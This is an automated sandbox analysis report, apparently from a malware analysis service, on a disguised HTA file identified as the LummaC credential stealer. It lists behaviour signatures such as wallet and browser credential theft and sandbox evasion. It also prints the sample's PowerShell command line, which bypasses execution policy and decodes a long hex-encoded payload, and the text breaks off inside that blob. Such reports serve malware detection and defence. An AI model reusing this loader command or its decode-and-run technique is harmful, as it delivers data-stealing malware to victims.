Edit tour
Windows
Analysis Report
singl6.mp4.hta
Overview
General Information
Detection
LummaC
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell Download and Execute IEX
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 3384 cmdline:
mshta.exe "C:\Users\ user\Deskt op\singl6. mp4.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) - powershell.exe (PID: 1056 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop fun ction cDnC n($pBla){r eturn -spl it ($pBla -replace ' ..', '0x$& ')};$Lhmk = cDnCn(' A3AA4480FF 655084E70A DC84D9EA63 41178CCA80 AF8469B129 31F471AF82 7F36734F64 9E4FFC4814 65F7A8A2BF A75783C467 F30497BC4B 11E481C253 0797B14FC2 F5B368B220 16A880E652 482E6475CF 0DC1A66EA8 F0136B2BBC 629A30CEB8 60956FD493 62AEC15293 69252FC290 E746487657 0EB817D8E9 B180D54137 6938391A34 2371D8EEE7 C40B429917 ED3BAE7546 609A8390B6 70A9097CB2 F4371F68C2 66424FC610 C85C530E51 5400B772D5 00AE542F88 9F9A970F0C 0884F9DAB2 F28BCD3791 49C803B7F1 7EEC6C69E6 22BA1F8B13 247111CF1C CB79B4798B 7DFB6AEC68 A8F963D9FE 6AC1AF1987 A9FB2A16B0 F82B9BA594 307ADEEA75 7F6284F08D DB1A3BFA98 B3BEA493C2 C605A6EBF2 7BFDF963BE F1C0F74C61 BB82B80E6A 9B2F61E44A C18908A15A C5CA52E0D0 B5E7ECA5C6 29F9CE0881 40C0267010 5B1C1EB4C3 9C449DED3A 8E098E1483 2E1159B7BF E7F74012F5 AB28A812BD 11B0830216 EC8E5F537A D27755CAD7 EFBDAEB4C5 E623523372 9039ACA656 A57FB2D8AF EF2960E070 779A4CF1BD 35291B7033 D4618B7FBE C36B04BDD9 CC6D825285 FE8E9B14F7 83B7F3071A BE49F6BE8D FE02D7E8B0 A4E5FEAD85 70B4049362 BC3FF9599B EF08430DEA 16A596C8E8 AA8FEBE25A 7D3AEF1A0F 1D2A47644C 59B18A95C4 E955B6A747 C547978A14 71BD6004B1 ECD6443ABC 8058ED921C 2A97C1449A E376C36FB9 DA81ED841F 3F4437F694 17CEF04ACD 68C114464A A5755262E3 E2A8804F5D 1F018C9430 8E1802E6C5 9864386DF1 8AC9D19790 2C482A57D3 531FCB4988 6B15046AF7 8768F80014 DE486E0E78 D49561586C 41C0E653A2 A6BB84F1D7 467BB73BF1 E6FF73E925 40FCC809AA 398E26B9A7 08706094D4 A538285047 2779AD17B6 9C066B29CA AE8B04F605 E50CC29E84 80DD31E8DB 08E7717139 D5A19EE210 804AD16CA1 445A2EAC4D 7C66209914 C86431F3B5 174ECE947B EBD88F70D5 299D63C267 D52D0EA77D 645EBCDD39 A110138C08 2CD3C09CA8 AA75E9A53A 689D0576C3 32EE23948A E9ECCCE522 DACC38B358 1F9C71CFC2 7C56F81F9C B5C9D938E2 A35C15A5E7 CE4C1DB70B 003BF969AB 7131336F93 3529CEA80A 9FACB8C911 FDA0C52698 6D4E8FB5FD DDA4C0DF57 62BE378393 3E8E0AB3D7 12CD3B5633 09BDB03A54 60E12D1C34 126A4F8919 1E1C34197F 7EB35212BA A7E9D32890 ED00618DFE D16C97F2F7 09899CAEA8 4C4AA2A7B5 371A5FACA3 D115E12BE5 6D87319699 9184299302 AD235C87C2 26989D2CBE BA4D82E6C2 70F060D416 5DE6962A50 77677A4796 A0FC82E05A AB1272F503 9756832738 1A2D529A94 66317AB38D 192E338BDA 14927384DF 7CCBAFF9E8 5947482462 85B3D8AA54 C12D8C5335 1947654EA5 2F7B1A2972 4A48C14A1D 4FCAD70EDC 954B5D82A9 32AC8FF8A2 DCB79D1C10 C7458B14A4 0215396E30 6C046B7DD8 3B83B6EB6F FAE26FF38D E7E40F09DE 9FDD00EC21 F89B23814E BBD7E5B2A5 AA1A2C0CC6 814E4C15D1 27261B2972 0A28F85438 2CC1809268 5037C23B14 ED11E90915 036D385992 F5D948F977 5BB8B9C159 C5C39C63E6 8221BF35A5 518331151C 4C0BACB7B5 8F5A8B9DF3 2BD1C3C482 8D65896C8D C07B8002C8 12E8FED5F8